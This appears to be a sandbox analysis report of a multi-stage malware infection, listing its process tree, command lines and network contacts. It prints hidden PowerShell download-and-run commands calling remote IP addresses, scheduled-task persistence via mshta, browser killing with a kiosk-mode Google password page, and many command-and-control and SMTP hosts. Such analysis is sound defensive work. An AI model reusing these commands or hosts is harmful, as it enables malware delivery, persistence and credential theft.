PID 2824 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2824 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2824 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2824 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 2796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE
PID 3044 wrote to memory of 2796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE
PID 3044 wrote to memory of 2796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE
PID 3044 wrote to memory of 2796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE
PID 2796 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2796 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2796 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2796 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2644 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2644 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2644 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 2644 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1156 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1156 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1156 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1156 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2644 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 2644 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 2644 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 2644 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 2636 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 2636 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 2636 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 2636 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 2636 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 2636 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 2636 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 2636 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 1964 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\WerFault.exe
PID 1964 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\WerFault.exe
PID 1964 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\WerFault.exe
PID 1964 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\WerFault.exe
PID 2552 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2552 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2552 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2552 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2644 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe
PID 2644 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe
PID 2644 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe
PID 2644 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe
PID 2976 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe C:\Windows\SysWOW64\cmd.exe
PID 2976 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe C:\Windows\SysWOW64\cmd.exe
PID 2976 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe C:\Windows\SysWOW64\cmd.exe
PID 2976 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe C:\Windows\SysWOW64\cmd.exe
PID 2976 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe C:\Windows\SysWOW64\mshta.exe
PID 2976 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe C:\Windows\SysWOW64\mshta.exe
PID 2976 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe C:\Windows\SysWOW64\mshta.exe
PID 2976 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe C:\Windows\SysWOW64\mshta.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe

"C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn TtUPWma8i2b /tr "mshta C:\Users\Admin\AppData\Local\Temp\EDNDI4qKk.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\EDNDI4qKk.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn TtUPWma8i2b /tr "mshta C:\Users\Admin\AppData\Local\Temp\EDNDI4qKk.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE

"C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe

"C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs"

C:\Users\Admin\AppData\Local\Temp\Build.exe

"C:\Users\Admin\AppData\Local\Temp\Build.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 988

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn GFQXqmaU7LI /tr "mshta C:\Users\Admin\AppData\Local\Temp\qzB3DS6ZF.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\qzB3DS6ZF.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn GFQXqmaU7LI /tr "mshta C:\Users\Admin\AppData\Local\Temp\qzB3DS6ZF.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'EZ54RVN0BRBSYKQEUJMKPJ7U62CGNUVD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempEZ54RVN0BRBSYKQEUJMKPJ7U62CGNUVD.EXE

"C:\Users\Admin\AppData\Local\TempEZ54RVN0BRBSYKQEUJMKPJ7U62CGNUVD.EXE"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "F10yxmaQB9N" /tr "mshta \"C:\Temp\VXKOLlpHx.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\VXKOLlpHx.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\system32\taskeng.exe

taskeng.exe {CE7F9251-1DED-49F3-AEBD-A8802E132FF3} S-1-5-21-2039016743-699959520-214465309-1000:PIDEURYY\Admin:Interactive:[1]

C:\ProgramData\xishrtx\ukdupn.exe

C:\ProgramData\xishrtx\ukdupn.exe

C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe

"C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10108710101\17f337a055.exe

"C:\Users\Admin\AppData\Local\Temp\10108710101\17f337a055.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\c9a9737454.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\c9a9737454.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\c9a9737454.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\c9a9737454.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1312 -s 512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 904 -s 1016

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10108730101\001fe21595.exe

"C:\Users\Admin\AppData\Local\Temp\10108730101\001fe21595.exe"

C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe

"C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10108750101\0d8c3b8c27.exe

"C:\Users\Admin\AppData\Local\Temp\10108750101\0d8c3b8c27.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 1196

C:\Users\Admin\AppData\Local\Temp\10108760101\d489e96a96.exe

"C:\Users\Admin\AppData\Local\Temp\10108760101\d489e96a96.exe"

C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe

"C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2692.0.857827068\1064580875" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1236 -prefsLen 20769 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33fc7c1a-a7f8-4e71-a6d1-7873b8599e30} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" 1304 117d7e58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2692.1.1159006814\261580427" -parentBuildID 20221007134813 -prefsHandle 1508 -prefMapHandle 1504 -prefsLen 21630 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b27cd03-3ecb-4e59-a78f-0b3178efbf28} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" 1520 d71b58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2692.2.775843964\1714904728" -childID 1 -isForBrowser -prefsHandle 1988 -prefMapHandle 1984 -prefsLen 21668 -prefMapSize 233414 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b99197e-d907-4b13-ab5d-20b526688382} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" 2000 19579458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2692.3.474601283\1472978644" -childID 2 -isForBrowser -prefsHandle 2656 -prefMapHandle 2652 -prefsLen 26073 -prefMapSize 233414 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c12c7707-8598-4f1a-9e08-03cc48175b85} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" 2672 1ce6ce58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2692.4.2017003746\1631384618" -childID 3 -isForBrowser -prefsHandle 3792 -prefMapHandle 3788 -prefsLen 26273 -prefMapSize 233414 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8bae1254-91e3-45aa-bcd2-eed336eb9a82} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" 3804 1f1a6358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2692.5.1177950450\918328379" -childID 4 -isForBrowser -prefsHandle 3920 -prefMapHandle 3924 -prefsLen 26273 -prefMapSize 233414 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df0f4ee6-49b2-4c0a-a4a7-cbfc013be86a} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" 3908 1f1a6958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2692.6.128126482\819808931" -childID 5 -isForBrowser -prefsHandle 4080 -prefMapHandle 4084 -prefsLen 26273 -prefMapSize 233414 -jsInitHandle 856 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7463db4b-973e-4e83-b6ac-71adf6e75354} 2692 "\\.\pipe\gecko-crash-server-pipe.2692" 4072 1f1a6658 tab

C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe

"C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe"

C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe

"C:\Users\Admin\AppData\Local\Temp\10108790101\2asf3YX.exe"

C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10108800101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 504

C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe"

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.80.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.32.1:443 croprojegies.run tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 213.209.150.137:4117 towerbingobongoboom.com tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 8.8.8.8:53 out.berefeme.cim.br udp
US 8.8.8.8:53 abv.bg udp
BG 194.153.145.104:587 abv.bg tcp
US 8.8.8.8:53 mx2.telenet-ops.be udp
BE 195.130.132.9:587 mx2.telenet-ops.be tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 smtp.vodafone.de udp
US 8.8.8.8:53 seznam.cz udp
US 8.8.8.8:53 out.xtra.co.nz udp
US 8.8.8.8:53 _dc-mx.159e58ed5f8f.progressivedm.com udp
US 8.8.8.8:53 mail.wallywatts.com udp
US 8.8.8.8:53 smtp.virgilio.it udp
US 8.8.8.8:53 citromail.hu udp
US 8.8.8.8:53 out.ct.ct udp
US 8.8.8.8:53 ncl-ac-uk.mail.protection.outlook.com udp
US 8.8.8.8:53 voila.fr udp
US 8.8.8.8:53 smtp.thetrevelyanhotel.co.uk udp
US 8.8.8.8:53 smtp.wakefieldschoool.org udp
DE 151.189.176.206:587 smtp.vodafone.de tcp
US 8.8.8.8:53 smtp.colegioelamericano.edu.pe udp
US 8.8.8.8:53 aspmx.l.google.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
CZ 77.75.79.222:587 seznam.cz tcp
GB 142.250.187.206:443 youtube.com tcp
DE 46.101.111.206:587 mail.wallywatts.com tcp
IT 213.209.1.145:587 smtp.virgilio.it tcp
DE 167.99.248.199:587 citromail.hu tcp
IE 52.218.97.220:587 voila.fr tcp
NL 52.101.73.28:2525 ncl-ac-uk.mail.protection.outlook.com tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
NL 142.250.102.27:2525 aspmx.l.google.com tcp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 docomo.ne.jp udp
US 8.8.8.8:53 smtp.comcast.net udp
US 8.8.8.8:53 alltecdist.com udp
US 8.8.8.8:53 speednavi.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 sealnlock-com.mail.protection.outlook.com udp
NL 142.250.102.27:2525 aspmx.l.google.com tcp
US 8.8.8.8:53 centrum.sk udp
US 8.8.8.8:53 mx-b.delfi.lt udp
US 8.8.8.8:53 i.softbank.jp udp
US 8.8.8.8:53 auto-parc-france.de udp
US 96.102.167.165:587 smtp.comcast.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 104.26.12.69:587 centrum.sk tcp
US 52.101.40.0:2525 sealnlock-com.mail.protection.outlook.com tcp
DE 81.169.145.64:2525 auto-parc-france.de tcp
FR 46.105.57.169:2525 alltecdist.com tcp
US 8.8.8.8:53 mx-vip-02.kinghost.net udp
US 8.8.8.8:53 smtp.casinos-max.com udp
US 8.8.8.8:53 spaces.ru udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 pinkinbox.org udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
NL 188.116.21.53:587 spaces.ru tcp
LT 91.234.200.13:25 mx-b.delfi.lt tcp
US 8.8.8.8:53 docomo.ne.jp udp
GB 142.250.187.238:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
FI 65.109.49.216:25 pinkinbox.org tcp
GB 142.250.187.238:443 youtube-ui.l.google.com udp
US 52.223.34.187:587 docomo.ne.jp tcp
US 8.8.8.8:53 mx00.ionos.de udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 mail2.wizard101.com udp
CZ 77.75.79.222:587 seznam.cz tcp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 8.8.8.8:53 consent.youtube.com udp
BR 191.6.216.39:25 mx-vip-02.kinghost.net tcp
DE 212.227.15.41:25 mx00.ionos.de tcp
HK 172.247.161.208:2525 speednavi.com tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
